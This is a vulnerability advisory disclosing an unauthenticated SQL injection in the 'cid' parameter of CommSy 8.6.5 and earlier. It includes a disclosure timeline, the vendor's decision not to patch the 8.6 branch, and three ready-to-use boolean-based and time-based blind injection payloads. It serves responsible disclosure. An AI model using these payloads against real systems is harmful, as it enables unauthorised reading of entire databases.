CommSy 8.6.5 SQL Injection

CommSy version 8.6.5 suffers from a remote SQL injection vulnerability.

MD5 | 0aa181b0b3ef137ebde67a7a7ea633b0

CommSy 8.6.5 - SQL injection

Jens Regel, Schneider & Wulf EDV-Beratung GmbH & Co. KG


2019-04-15 Vulnerability discovered
2019-04-15 Asked for security contact and PGP key
2019-04-16 Send details to the vendor
2019-05-07 Flaw was approved but will not be fixed in branch 8.6
2019-05-15 Public disclosure

Affected Products:
CommSy <= 8.6.5

Vendor Homepage:

CommSy is a web-based community system, originally developed at the
University of Hamburg, Germany, to support learning/working communities.
We have discovered a unauthenticated SQL injection vulnerability in
CommSy <= 8.6.5 that makes it possible to read all database content. The
vulnerability exists in the HTTP GET parameter "cid".

Proof of Concept:
boolean-based blind:
commsy.php?cid=101" AND 3823=(SELECT (CASE WHEN (3823=3823) THEN 3823
ELSE (SELECT 7548 UNION SELECT 4498) END))-- dGRD&mod=context&fct=login

commsy.php?cid=101" AND (SELECT 6105 FROM(SELECT
(ELT(6105=6105,1))),0x716b6a6b71,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- jzQs&mod=context&fct=login

time-based blind:
commsy.php?cid=101" AND SLEEP(5)-- MjJM&mod=context&fct=login

According to the manufacturer, the version branch 8.6 is no longer
supported and the vulnerability will not be fixed. Customers should
update to the newest version 9.2.

Related Posts